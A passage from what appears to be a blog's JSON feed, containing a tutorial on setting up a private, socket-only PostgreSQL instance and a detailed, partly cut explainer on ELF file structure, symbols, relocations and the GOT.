The default configuration ~/.mutt/muttrc is a symlink to one of\nthose and is used when mutt is called directly.

"}, {"id": "http://www.gabriel.urdhr.fr/2015/09/29/private-postgresql/", "title": "Private PostgreSQL instance", "url": "https://www.gabriel.urdhr.fr/2015/09/29/private-postgresql/", "date_published": "2015-09-29T00:00:00+02:00", "date_modified": "2015-09-29T00:00:00+02:00", "tags": ["computer", "sql"], "content_html": "

How to create a private on-demand PostgreSQL instance accessible only\nto the local user over a UNIX socket.

\n

Setup

\n

Create the database

\n

Let's create a directory for our database:

\n
mkdir ~/mydb\ncd ~/mydb\n
\n\n\n

We'll use some environment variables:

\n\n
PATH=\"/usr/lib/postgresql/9.4/bin:$PATH\"\nPGDATA=\"$(pwd)\" ; export PGDATA # for initdb, postgresql, pg_ctl\nPGHOST=\"$(pwd)\" ; export PGHOST # for psql\n
\n\n\n

We can now create the PostgreSQL database:

\n
initdb\n
\n\n\n

Paranoid UNIX socket configuration

\n

Only allow the current user to connect with UNIX socket (and disable IP\nsockets):

\n
cat >> postgresql.conf <<EOF\n# Get off my lawn:\nlisten_addresses = ''\nunix_socket_directories = '.'\nunix_socket_permissions = 0700\nEOF\n
\n\n\n

On Linux, the unix_socket_permissions setting prevents any other local user from\nconnecting to the socket. On other *nix systems, this does not work.

\n

Let's reject any connection from other users (in pg_hba.conf):

\n
echo \"local   all    $USER    ident\" > pg_hba.conf\n
\n\n\n

Usage

\n

Start the database server:

\n
pg_ctl start\n
\n\n\n

For convenience, let's create a $USER database (because by default psql\nconnects to the $USER database with the $USER login):

\n
psql postgres <<EOF\ncreate database $USER;\nEOF\n
\n\n\n

Now we can connect to this database with:

\n
psql\n
\n\n\n

Stop the database server:

\n
pg_ctl stop\n
\n\n\n

IP socket support

\n

Many services can only connect over IP. If this is needed, we have\nto relax the security of the service and allow connections over IP:

\n

Let's listen on the loopback device:

\n
listen_addresses = 'localhost'\n
\n\n\n

Allow connection using the loopback device:

\n
cat << EOF >> pg_hba.conf\nhostnossl   all    $USER  127.0.0.1/32  md5\nhostnossl   all    $USER  ::1/128       md5\nEOF\n
\n\n\n

Set a password for the user:

\n
alter user foo with password 'secret';\n
\n\n\n

Another solution is to use a local ident server with the ident method.\nThis should be safe for the loopback interface if the configuration of the\nident server is suitable.

\n

Bonus: CSV import

\n

With SQL syntax (using the server filesystem and working directory):

\n
create table if not exists test(a int, b int);\ndelete from test;\ncopy test from 'test.csv' with csv header;\n
\n\n\n

STDIN or PROGRAM 'cat test.csv' can be used as well.

\n

With psql commands (using the client filesystem and working\ndirectory):

\n
\\copy test from 'test.csv' csv header\n
"}, {"id": "http://www.gabriel.urdhr.fr/2015/09/28/elf-file-format/", "title": "The ELF file format", "url": "https://www.gabriel.urdhr.fr/2015/09/28/elf-file-format/", "date_published": "2015-09-28T00:00:00+02:00", "date_modified": "2015-09-28T00:00:00+02:00", "tags": ["computer", "system", "elf", "linking", "dwarf"], "content_html": "

Some notes on the ELF file format with references, explanations and\nsome examples.

\n

The ELF file format is a standard file format for executable files,\ndynamic libraries27 (DSOs, .so files), compiled\ncompilation units (.o files) and core dumps. It is used for many\nplatforms6 including many recent Unix-ish systems (System V,\nGNU, BSD) and embedded software5.

\n

You might want to read this document alongside the outputs of\nreadelf, objdump -D2, objcopy --dump-section,\nelfcat7 and/or a\nhexadecimal editor. You might want to cross-reference with elf.h,\nthe manpage (man 5 elf) or the ELF\nspecs.

\n

Basic structure

\n

The ELF header is located at the beginning of the\nELF file and contains information about the target OS, architecture,\nthe type of ELF file (executable, dynamic library, etc.) and the\nlocation of two important structures within the ELF file defining two\nviews of the ELF file:

\n\n

Execution view

\n

The execution view is given by the program header\ntable. This table is used (by the kernel,\nby the dynamic linker, etc.) to create a runtime image of the program\nin memory:

\n\n

Linking view

\n

The linking view is given by the section header\ntable which describes the location of the\ndifferent sections (within the file and within the runtime\nimage of the program).

\n

The .o files generated by the compiler are made of different\nsections (.text for executable code, .data for initialised global\nvariables, .bss for uninitialised global variables, .rodata for\nread-only global variables, etc.): the link editor combines different\n.o files into a single executable or DSO (by merging the sections of\nthe different .o files with the same name) and generates some others\n(.got, .dynamic, .plt, .got.plt, etc.)12.

\n

The linking view is not used at runtime: all the information needed at\nruntime is in the program header table. Some sections are not\nused at runtime (debugging information, full symbol table) and are not\npresent in the execution view. Those sections and the section header\ntable can be omitted (or stripped) from the ELF file.

\n

If they are present, this extra information can be used by debugging\ntools (such as GDB), profiling tools, etc. Many tools for inspection\nand manipulation of ELF files (readelf, objdump) rely on the\nsection header table to work correctly.

\n

Other important structures

\n

The dynamic section contains important\ninformation used for dynamic linking.

\n

Symbol tables list the symbols defined and\nused by the file.

\n

Hash tables are used for efficient lookup of\nsymbols by their name (symbol table entries by symbol name).

\n

Relocation tables list the relocations\nneeded to relocate the ELF file at a different memory address or to\nlink it to other ELF objects;

\n

String tables are lists of strings which are\nreferenced at other places in the ELF file (for section names in the\nsection header table, for symbol names on the symbol tables, etc.);

\n

The GOT is a table filled by the dynamic linker with\naddresses of functions and variables. The program uses those entries\nto get the address of variables or functions which could be located in\nanother ELF module.

\n

The PLT contains trampolines: they are stubs for functions\nwhich might be located in another ELF module. The program calls those\nstubs which call the real function (by dereferencing a corresponding\nGOT entry). This is used for lazy relocation.

\n

Notes are used to add miscellaneous information (such\nas GNU ABI information and GNU build IDs).

\n

ELF header

\n

The ELF header is at the beginning of the ELF file and contains:

\n\n

The ELF header is using the following structure4:

\n
typedef struct {\n  unsigned char e_ident[EI_NIDENT]; /* Magic number and other info */\n  Elf64_Half    e_type;             /* Object file type */\n  Elf64_Half    e_machine;          /* Architecture */\n  Elf64_Word    e_version;          /* Object file version */\n  Elf64_Addr    e_entry;            /* Entry point virtual address */\n  Elf64_Off     e_phoff;            /* Program header table file offset */\n  Elf64_Off     e_shoff;            /* Section header table file offset */\n  Elf64_Word    e_flags;            /* Processor-specific flags */\n  Elf64_Half    e_ehsize;           /* ELF header size in bytes */\n  Elf64_Half    e_phentsize;        /* Program header table entry size */\n  Elf64_Half    e_phnum;            /* Program header table entry count */\n  Elf64_Half    e_shentsize;        /* Section header table entry size */\n  Elf64_Half    e_shnum;            /* Section header table entry count */\n  Elf64_Half    e_shstrndx;         /* Section header string table index */\n} Elf64_Ehdr;\n
\n\n\n

readelf -h can display the content of the ELF header.

\n
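The first fields of the header can be decoded with a few lines of Python (a sketch handling 64-bit little-endian files only; readelf handles the general case, and the fake header bytes below are made up for the example):

```python
import struct

def parse_elf_ident(data):
    """Decode the beginning of an ELF header: magic, class,
    data encoding, then e_type and e_machine (LSB encoding assumed)."""
    if data[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class, ei_data = data[4], data[5]  # 1/2 = 32/64-bit, 1/2 = LSB/MSB
    # After the 16-byte e_ident come e_type and e_machine (both Elf64_Half).
    e_type, e_machine = struct.unpack_from("<HH", data, 16)
    return ei_class, ei_data, e_type, e_machine

# A minimal fake header: 64-bit, little-endian, ET_DYN (3), EM_X86_64 (62)
header = b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + struct.pack("<HH", 3, 62)
print(parse_elf_ident(header))
```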

ELF class

\n

The e_ident[EI_CLASS] field describes the ELF class: 32-bit\n(ELFCLASS32) or 64-bit (ELFCLASS64) for 32-bit and 64-bit programs\nrespectively.

\n

The ELF structures are different for the two ELF classes: the fields\nare the same but their type and sometimes their order is different (in\norder to have packed structures). For example, the ELF header is\nusing the Elf32_Ehdr and Elf64_Ehdr structures for ELFCLASS32\nand ELFCLASS64 respectively.

\n

ELF endianness

\n

The e_ident[EI_DATA] field describes the encoding (endianness) of the\narchitecture (either ELFDATA2LSB or ELFDATA2MSB). The fields of\nthe ELF file are encoded in the encoding/endianness of the\narchitecture: you might have to swap the endianness (see endian.h) if\nyou process ELF files from a foreign architecture.

\n

ELF type

\n

The ELF type is in the e_type field:

\n\n

A major difference between ET_EXEC and ET_DYN files is that\nET_EXEC files are always mapped at a fixed position in the virtual\naddress space. In contrast, ET_DYN files can be relocated anywhere in the\nvirtual address space by applying a constant offset to their virtual\naddresses10: the same .so file can be mapped at different\nlocations in different processes9. Usually, the\nshared-object uses address 0 as its base address in the ELF file29.

\n

Normal (ET_EXEC) executables are always mapped at a given location\nso the locations of their subprograms and global variables are always\nthe same for each process. This knowledge can be exploited by an\nattacker to get control of the process. In order to avoid this, the\nprogram can be compiled as a\nPIE11\nwhich can be mapped (relocated) at any address in the process virtual\naddress space. PIEs, being relocatable, are ET_DYN instead of\nET_EXEC files.

\n

The Linux kernel (vmlinux) uses the ET_EXEC type and its loadable\nmodules (.ko files) use the ET_REL type.

\n

Location of the header tables

\n

The location of the section header table and program header table are\ndescribed in the ELF header:

\n\n

Section header table

\n

The section header table defines the linking view of the ELF file:\neach entry defines a section within the file. The compiler generates\nrelocatable objects (.o files) made of different sections (.text,\n.data, .rodata, .bss, etc.). When the link editor ld combines\ndifferent relocatable objects into an executable or shared-object, it\nmerges the sections with the same name into a single section in the\nfinal output. For example, it combines the .text sections\n(containing the compiled code) of the different .o files into a single\n.text section.

\n

The section table is an array of section descriptions with the\nstructure:

\n
typedef struct {\n  Elf64_Word    sh_name;      /* Section name (string tbl index) */\n  Elf64_Word    sh_type;      /* Section type */\n  Elf64_Xword   sh_flags;     /* Section flags */\n  Elf64_Addr    sh_addr;      /* Section virtual addr at execution */\n  Elf64_Off     sh_offset;    /* Section file offset */\n  Elf64_Xword   sh_size;      /* Section size in bytes */\n  Elf64_Word    sh_link;      /* Link to another section */\n  Elf64_Word    sh_info;      /* Additional section information */\n  Elf64_Xword   sh_addralign; /* Section alignment */\n  Elf64_Xword   sh_entsize;   /* Entry size if section holds table */\n} Elf64_Shdr;\n
\n\n\n

The first entry of a section header table is always an empty null\nsection (type SHT_NULL).

\n

readelf -S can display the section header table. readelf -x can be\nused to get a hexdump of a given ELF section. A raw dump of a section\ncan be produced with objcopy a.out --dump-section .dynstr=/dev/stdout\n/dev/null | cat. Note that some sections are not visible to\nobjcopy and objdump: you might want to use\nelfcat7 instead.

\n

Section names

\n

Each section has a name (.text, .data, .rodata, .bss, .got,\n.plt, etc.): all section names are stored in a string table\n(.shstrtab). The e_shstrndx field of the ELF header is the index\n(in the section header table) of the section containing the section\nnames:

\n
ELF Header:\n  Magic:   7f 45 4c 46 02 01 01 00 00 00 00 00 00 00 00 00\n  Class:                             ELF64\n[...]\n  Section header string table index: 26\n\nSection Headers:\n  [Nr] Name              Type             Address           Offset\n       Size              EntSize          Flags  Link  Info  Align\n  [26] .shstrtab         STRTAB           0000000000000000  0001e220\n       00000000000000f3  0000000000000000           0     0     1\n
\n\n

The sh_name field of the section header is the byte offset of the\nsection name within this string table.

\n

Existing sections

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
Section nameTypeUsage (and equivalent runtime description)
.textSHT_PROGBITSMain executable code
.dataSHT_PROGBITSInitialised read and write data
.rodataSHT_PROGBITSRead only data
.bssSHT_NOBITSUninitialised read and write data
.data.rel.roSHT_PROGBITS
.tdataSHT_PROGBITSInitialised thread-local data (part of PT_TLS)
.tbssSHT_NOBITSUninitialised thread-local data (part of PT_TLS)
.initSHT_PROGBITSInitialisation code (usually .init, DT_INIT)
.finiSHT_PROGBITSTermination code (usually .fini, DT_FINI)
.init_arraySHT_INIT_ARRAYAddresses of initialisation functions (DT_INIT_ARRAY and DT_INIT_ARRAYSZ)
.fini_arraySHT_FINI_ARRAYAddresses of termination functions (DT_FINI_ARRAY and DT_FINI_ARRAYSZ)
.ctorsSHT_PROGBITSSimilar to .init_array but old-school
.dtorsSHT_PROGBITSSimilar to .fini_array but old-school
.dynsymSHT_DYNSYMDynamic symbol table (DT_SYMTAB)
.dynstrSHT_STRTABString table for dynamic linking (DT_STRTAB)
.symtabSHT_SYMTABFull symbol table
.symtab_shndxSHT_SYMTAB_SHNDX
.strtabSHT_STRTABString table used for the symbol table
.relaXXXSHT_RELARelocations for section XXX, with addend
.relXXXSHT_RELRelocations for section XXX, without addend
.rela.dynSHT_RELAOther runtime relocations, with addend
.rel.dynSHT_RELOther runtime relocations, without addend
.rela.pltSHT_RELAPLT relocations, with addend
.rel.pltSHT_RELPLT relocations, without addend
.gotSHT_PROGBITSMain GOT
.got.pltSHT_PROGBITSPLT GOT, GOT used by the PLT (lazy relocations)
.hashSHT_HASHStandard symbol hash table (DT_HASH)
.gnu.hashSHT_GNU_HASHGNU symbol hash table (DT_GNU_HASH)
.gnu.versionSHT_VERSYMGNU symbol versions (DT_VERSYM)
.gnu.version_rSHT_VERNEEDGNU versions requirements (DT_VERNEED and DT_VERNEED_NUM)
.gnu.version_dSHT_VERDEFGNU versions definitions (DT_VERDEF and DT_VERDEF_NUM)
.debug_infoSHT_PROGBITSDWARF, Main DWARF section (variables, subprograms, types, etc.)
.debug_abbrevSHT_PROGBITSDWARF, Abbreviations describing the structure of the nodes in .debug_info
.debug_arangesSHT_PROGBITSDWARF
.debug_lineSHT_PROGBITSDWARF, Mapping between instruction and source code lines
.debug_strSHT_PROGBITSDWARF, Strings for DWARF sections
.debug_frameSHT_PROGBITSDWARF, Stack unwinding information31
.debug_macroDebug macros (GNU extension)
.gnu_debuglink32
.stabSHT_PROGBITSDebugging information in the (old) stab format
.stabstrSHT_PROGBITSStrings associated with the .stab section
.eh_frameSHT_PROGBITSRuntime stack unwinding information31
.eh_frame_hdrSHT_PROGBITSHeader (location and index) of the EH frame table (PT_GNU_EH_FRAME)
.shstrtabSHT_STRTABString table for section names
.note.XXXXSHT_NOTENote
.note.ABI-tagSHT_NOTEABI used in this file (NT_GNU_ABI_TAG)
.note.gnu.build-idSHT_NOTEBuild-id for this build33 (NT_GNU_BUILD_ID note)
.dynamicSHT_DYNAMICDynamic table, dynamic linking information (PT_DYNAMIC)
.interpSHT_PROGBITSInterpreter (PT_INTERP)
.groupSHT_GROUPGroup of related sections (used for COMDAT)
.comment
.jcrSHT_PROGBITSUsed for Java (?)
.stapsdt.baseUsed for SystemTap SDT
.note.stapsdtUsed for SystemTap SDT
.gcc_except_tableSHT_PROGBITSLSDA (Language Specific Data) for exception handling
.gnu.warningWarning message when linking against this file34
.gnu.warning.XXXSHT_PROGBITSWarning message when linking against symbol XXX34
.ARM.extabSHT_PROGBITS
.ARM.exidxSHT_ARM_EXIDX
.ARM.attributesSHT_ARM_ATTRIBUTES
\n

Section types

\n\n

Section link

\n

For symbol tables (SHT_SYMTAB and SHT_DYNSYM) and the dynamic\nsection (SHT_DYNAMIC), the sh_link gives the index of the string\ntable used to find the strings referenced in the section.

\n

For symbol hash tables (SHT_HASH and SHT_GNU_HASH) and relocation\ntables (SHT_RELA and SHT_REL), it gives the index of the\nassociated symbol table.

\n

Section info

\n

For relocation tables, the sh_info field gives the index of the\nsection it applies to. This is mostly relevant for .o files. For\nexecutables and DSOs on GNU systems, the .rela.dyn uses 0 because it\napplies to many different sections and .rela.plt uses the index of\nthe .plt even if it applies to the .got.plt.

\n

For symbol tables, it gives the index of the first non-local symbol,\nwhich can be used to skip the STB_LOCAL symbols.

\n

Section flags

\n

The sh_flags is a field of flags:

\n\n

Program header table

\n

The program header table defines the execution view of the ELF file:

\n\n

The program table is an array of program headers:

\n
typedef struct {\n   uint32_t   p_type;   /* Segment type */\n   uint32_t   p_flags;  /* Segment flags */\n   Elf64_Off  p_offset; /* Segment file offset */\n   Elf64_Addr p_vaddr;  /* Segment virtual address */\n   Elf64_Addr p_paddr;  /* Segment physical address */\n   uint64_t   p_filesz; /* Segment size in file */\n   uint64_t   p_memsz;  /* Segment size in memory */\n   uint64_t   p_align;  /* Segment alignment */\n} Elf64_Phdr;\n
\n\n\n

The program header table can be seen with readelf -l. readelf\nalso shows which sections are located in each region described by a\nprogram header entry.

\n

Segments

\n

A PT_LOAD entry represents a loadable segment which is loaded (typically\nwith mmap()) into the program memory. A typical ELF executable or DSO has\ntwo such entries describing two segments28:

\n
    \n
  1. \n

The first one is the text segment. It is executable, readable\n but not writable and contains code and read-only data (.text,\n .rodata, .plt, .eh_frame, etc.);

    \n
  2. \n
  3. \n

The second one is the data segment. It is readable, writable but\n not executable and contains the modifiable data (.data, .got,\n .got.plt, .bss, etc.).

    \n
  4. \n
\n

The idea behind this separation is that everything which does not need to\nbe written (read-only data, code) should be read-only:

\n\n

Security considerations

\n

Another important property in the design is that executable segments\nare not writable14. If a process has VMAs36 which are both\nexecutable and writable, an attacker might exploit bugs such as buffer\noverflows in order to write arbitrary code into the program's memory and\npossibly execute it. If the executable pages are read-only, the\nattacker can still write arbitrary code somewhere but it will not be\nexecutable13.

\n

Example

\n

A simple hello world program:

\n
  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n  PHDR           0x0000000000000040 0x0000000000400040 0x0000000000400040\n                 0x00000000000001c0 0x00000000000001c0  R E    8\n  INTERP         0x0000000000000200 0x0000000000400200 0x0000000000400200\n                 0x000000000000001c 0x000000000000001c  R      1\n      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]\n  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000\n                 0x00000000000006dc 0x00000000000006dc  R E    200000\n  LOAD           0x00000000000006e0 0x00000000006006e0 0x00000000006006e0\n                 0x0000000000000230 0x0000000000002288  RW     200000\n  DYNAMIC        0x00000000000006f8 0x00000000006006f8 0x00000000006006f8\n                 0x00000000000001d0 0x00000000000001d0  RW     8\n  NOTE           0x000000000000021c 0x000000000040021c 0x000000000040021c\n                 0x0000000000000044 0x0000000000000044  R      4\n  GNU_EH_FRAME   0x00000000000005b4 0x00000000004005b4 0x00000000004005b4\n                 0x0000000000000034 0x0000000000000034  R      4\n  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000\n                 0x0000000000000000 0x0000000000000000  RW     10\n
\n\n

We can see the resulting VMAs36 in /proc/$pid/maps of a\ncorresponding process:

\n\n
\n00400000-00401000 r-xp 00000000 08:13 27418661   /home/foo/temp/wait\n00600000-00601000 rw-p 00000000 08:13 27418661   /home/foo/temp/wait\n00601000-00603000 rw-p 00000000 00:00 0\n[...]\n
\n\n

Read only relocations

\n

On GNU systems, the dynamic linker may be instructed to mprotect()\nthe .got section against write access after the relocation is\nfinished. This improves security by preventing the poisoning of\nthe (non-PLT) GOT26 after the relocation is done.

\n

This is enabled with ld -z relro (which generates a PT_GNU_RELRO\nentry) and disabled explicitly with ld -z norelro. When enabled,\nPT_GNU_RELRO is present in the program header table and describes a\nrange of memory which the dynamic linker can mprotect() after the\n(non-lazy) relocation is done (the .got section).

\n

The same example program linked with ld -z relro features the\nadditional PT_GNU_RELRO entry:

\n
Program Headers:\n  Type           Offset             VirtAddr           PhysAddr\n                 FileSiz            MemSiz              Flags  Align\n  PHDR           0x0000000000000040 0x0000000000400040 0x0000000000400040\n                 0x00000000000001f8 0x00000000000001f8  R E    8\n  INTERP         0x0000000000000238 0x0000000000400238 0x0000000000400238\n                 0x000000000000001c 0x000000000000001c  R      1\n      [Requesting program interpreter: /lib64/ld-linux-x86-64.so.2]\n  LOAD           0x0000000000000000 0x0000000000400000 0x0000000000400000\n                 0x000000000000070c 0x000000000000070c  R E    200000\n  LOAD           0x0000000000000e10 0x0000000000600e10 0x0000000000600e10\n                 0x0000000000000230 0x0000000000002258  RW     200000\n  DYNAMIC        0x0000000000000e28 0x0000000000600e28 0x0000000000600e28\n                 0x00000000000001d0 0x00000000000001d0  RW     8\n  NOTE           0x0000000000000254 0x0000000000400254 0x0000000000400254\n                 0x0000000000000044 0x0000000000000044  R      4\n  GNU_EH_FRAME   0x00000000000005e4 0x00000000004005e4 0x00000000004005e4\n                 0x0000000000000034 0x0000000000000034  R      4\n  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000\n                 0x0000000000000000 0x0000000000000000  RW     10\n  GNU_RELRO      0x0000000000000e10 0x0000000000600e10 0x0000000000600e10\n                 0x00000000000001f0 0x00000000000001f0  R      1\n
\n\n

This can be seen in /proc/$pid/maps:

\n\n
\n00400000-00401000 r-xp 00000000 08:13 27418663   /home/foo/temp/wait2\n00600000-00601000 r--p 00000000 08:13 27418663   /home/foo/temp/wait2\n00601000-00602000 rw-p 00001000 08:13 27418663   /home/foo/temp/wait2\n00602000-00604000 rw-p 00000000 00:00 0\n[...]\n
\n\n

In addition, ld -z now (DF_BIND_NOW) may be used to disable\nlazy relocation. By combining the two options, you can get an\nexecutable or DSO without .got.plt where all of the GOT is read-only\nafter relocation.

\n

Other program header entries

\n\n

String tables

\n

String tables are lists of strings. They use the SHT_STRTAB section\ntype. Each string in the string table is terminated by a NUL byte and\nis referenced by its byte offset from the beginning of the table.

\n

The first entry of a string table is always the empty string (the\nfirst byte of a string table is always NUL): the empty string can\nalways be designated with the zero offset.

\n

The content of a string section can be displayed with readelf -p .dynstr\nor with objcopy a.out --dump-section .dynstr=/dev/stdout /dev/null | tr '\\000' '\\n'.

\n

Usages:

\n\n

References to string tables:

\n\n

Example of .shstrtab (x86_64 GNU/Linux)

\n

Section Headers:

\n
\n[Nr] Name              Type             Address           Offset\n     Size              EntSize          Flags  Link  Info  Align\n[27] .shstrtab         STRTAB           0000000000000000  000008f1\n     0000000000000108  0000000000000000           0     0     1\n
\n\n

File hexdump:

\n
[...]\n000008b0: 0000 0000 0000 0000 4743 433a 2028 4465  ........GCC: (De\n000008c0: 6269 616e 2034 2e39 2e32 2d31 3029 2034  bian 4.9.2-10) 4\n000008d0: 2e39 2e32 0047 4343 3a20 2844 6562 6961  .9.2.GCC: (Debia\n000008e0: 6e20 342e 382e 342d 3129 2034 2e38 2e34  n 4.8.4-1) 4.8.4\n000008f0: 0000 2e73 796d 7461 6200 2e73 7472 7461  ...symtab..strta\n00000900: 6200 2e73 6873 7472 7461 6200 2e69 6e74  b..shstrtab..int\n00000910: 6572 7000 2e6e 6f74 652e 4142 492d 7461  erp..note.ABI-ta\n00000920: 6700 2e6e 6f74 652e 676e 752e 6275 696c  g..note.gnu.buil\n00000930: 642d 6964 002e 676e 752e 6861 7368 002e  d-id..gnu.hash..\n00000940: 6479 6e73 796d 002e 6479 6e73 7472 002e  dynsym..dynstr..\n00000950: 676e 752e 7665 7273 696f 6e00 2e67 6e75  gnu.version..gnu\n00000960: 2e76 6572 7369 6f6e 5f72 002e 7265 6c61  .version_r..rela\n00000970: 2e64 796e 002e 7265 6c61 2e70 6c74 002e  .dyn..rela.plt..\n00000980: 696e 6974 002e 7465 7874 002e 6669 6e69  init..text..fini\n00000990: 002e 726f 6461 7461 002e 6568 5f66 7261  ..rodata..eh_fra\n000009a0: 6d65 5f68 6472 002e 6568 5f66 7261 6d65  me_hdr..eh_frame\n000009b0: 002e 696e 6974 5f61 7272 6179 002e 6669  ..init_array..fi\n000009c0: 6e69 5f61 7272 6179 002e 6a63 7200 2e64  ni_array..jcr..d\n000009d0: 796e 616d 6963 002e 676f 7400 2e67 6f74  ynamic..got..got\n000009e0: 2e70 6c74 002e 6461 7461 002e 6273 7300  .plt..data..bss.\n000009f0: 2e63 6f6d 6d65 6e74 0000 0000 0000 0000  .comment........\n
\n\n

This string table of section names starts at 0x8f1:

\n\n

Symbols and the symbol table

\n

What's a symbol?

\n

Symbols are used for linking (by the link editor and the dynamic\nlinker).

\n

The C statement:

\n
extern int foo;\n\nint foo = 3;\n
\n\n\n

defines a global variable associated with the foo symbol15.

\n

A user of this global variable:

\n
extern int foo;\n\nint foo_updater()\n{\n  return foo++;\n}\n
\n\n\n

will link to the foo symbol.

\n

The linker will bind the user of the global variable with the global variable\nbecause they are using the same symbol name.

\n

Symbol tables

\n

The section header table often includes two different symbol tables:

\n\n

The former can be used by debugging tools and the latter contains the\nminimum set of entries needed by the dynamic linker. For this reason,\nonly the latter is mapped in the process virtual address space and is\npresent in the dynamic table.

\n

The symbol tables are arrays of symbol entries:

\n
typedef struct {\n  Elf64_Word    st_name;  /* Symbol name (string tbl index) */\n  unsigned char st_info;  /* Symbol type and binding */\n  unsigned char st_other; /* Symbol visibility (and 0) */\n  Elf64_Section st_shndx; /* Section index */\n  Elf64_Addr    st_value; /* Symbol value */\n  Elf64_Xword   st_size;  /* Symbol size */\n} Elf64_Sym;\n
\n\n\n

At runtime, the dynamic symbol table is given by the dynamic table\nentry DT_SYMTAB. Its size is not given and can be\ninferred\nfrom the hash table (DT_HASH or DT_GNU_HASH).

\n

readelf -s can display the symbol tables.

\n

Symbol type

\n\n

Section index

\n

Each symbol can be associated with a section (by its index).

\n

Some special values are used:

\n\n

Visibility and binding

\n

Common visibility and binding combinations:

\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n
BindingVisibilityMeaning
STB_LOCALSTV_DEFAULTLocal to the relocatable object
STB_GLOBALSTV_HIDDENLocal to the executable or DSO37
STB_GLOBALSTV_DEFAULTGlobal (visible in other runtime ELF modules)
\n

Symbol binding

\n

The symbol binding controls the link-time visibility of the symbol\n(i.e. outside translation units and within a given runtime ELF object\nbut not across runtime ELF objects). It is a part of the st_info\nfield.

\n\n

Multiple symbols with the same name can be in the same ET_EXEC or ET_DYN\n (originating from different ET_REL): in the .symtab, they are usually\n located after a STT_FILE entry giving the source file name\n of the corresponding compilation unit.

\n\n

When combining multiple .o files into one executable or DSO, the\n link editor will raise an error if multiple STB_GLOBAL definitions of\n the same symbol are present, but a STB_WEAK symbol with the same\n name as a STB_GLOBAL or another STB_WEAK symbol can appear.

\n

A weak symbol does not need to be resolved: an unresolved weak\n symbol has a value of 0. The link editor will not pull .o\n relocatable objects from .a archives in order to resolve undefined\n weak symbols.

\n

Symbol visibility

\n

The symbol visibility controls the visibility across executable and\nDSOs. It is stored in the st_other field. This field is not\nrelevant for STT_LOCAL symbols.

\n

The different values are:

\n\n

The STV_HIDDEN visibility can be used in order to mark symbols which need not\nbe used outside of the DSO:

\n\n

The visibility of a symbol can be defined in GCC with the visibility\nattribute:

\n
__attribute__((visibility(\"hidden\")))\nint get_answer(void)\n{\n  return 42;\n}\n
\n\n\n

The default visibility can be changed with command-line\narguments\nin recent versions of GCC (gcc -fvisibility=hidden) or with\npragmas:

\n
#pragma GCC visibility push(hidden)\nint get_answer(void)\n{\n  return 42;\n}\n#pragma GCC visibility pop\n
\n\n\n

Relocation tables

\n

The relocation tables are arrays of relocation entries using one of those\nforms:

\n
typedef struct {\n  Elf64_Addr    r_offset;  /* Address */\n  Elf64_Xword   r_info;    /* Relocation type and symbol index */\n} Elf64_Rel;\n\ntypedef struct {\n  Elf64_Addr    r_offset;  /* Address */\n  Elf64_Xword   r_info;    /* Relocation type and symbol index */\n  Elf64_Sxword  r_addend;  /* Addend */\n} Elf64_Rela;\n
\n\n\n

The relocations exist in two forms. In both cases an addend\nis added to the symbol:

\n\n

readelf -r can display the relocation tables.

\n

Relocation address

\n

ET_REL files have one relocation section .rela.foo (or .rel.foo)\nper relocated section .foo. The r_offset address of the relocation\nis the offset within the relocated .foo section.

\n

For ET_EXEC and ET_DYN files, there are usually two relocation\ntables: the normal relocation table .rela.dyn (or .rel.dyn) and\nthe lazy/PLT relocation table .rela.plt (or .rel.plt). The\nr_offset address of the relocation has a different meaning: it is\nthe (runtime) virtual address of the relocation. The location of the\nrelocation tables is described at runtime in the dynamic section\n(DT_RELA, DT_REL, DT_RELASZ, DT_RELSZ, DT_RELAENT,\nDT_RELENT, DT_PLTREL, DT_PLTRELSZ, DT_JMPREL).

\n

GOT

\n

The executable code is (usually) in the read-only segment:

\n\n

As we do not want to modify the code (in the read-only text segment) in\norder to share it, the dynamic linker cannot relocate the DSO by\npatching the addresses of the referenced objects in the executable\ncode. Instead, the address of the object is stored by the dynamic\nlinker in the writable segment and the code fetches this address.

\n

The link editor creates a section in the writable segment, the GOT\n(.got), containing all the slots for those addresses35. It\ncreates relocation entries in order to make the dynamic linker store\nthe suitable values in the GOT.

\n

GOT example x86_64

\n

Compilation

\n

For example, this C code:

\n
extern int foo;\n\nint get_foo()\n{\n  return foo;\n}\n
\n\n\n

compiles into this (gcc -S deref.c -o- -fPIC):

\n
get_foo:\n        movq    foo@GOTPCREL(%rip), %rax\n        movl    (%rax), %eax\n        ret\n
\n\n\n

foo@GOTPCREL(%rip) resolves to a memory address (an entry in the GOT)\nwhere the address of foo is written: the first instruction stores\nthis address in the %rax register. In the next instruction, the\nprocessor fetches the foo variable by dereferencing this address.

\n

Relocatable object

\n

When compiled into a relocatable object, we get this relocation:

\n
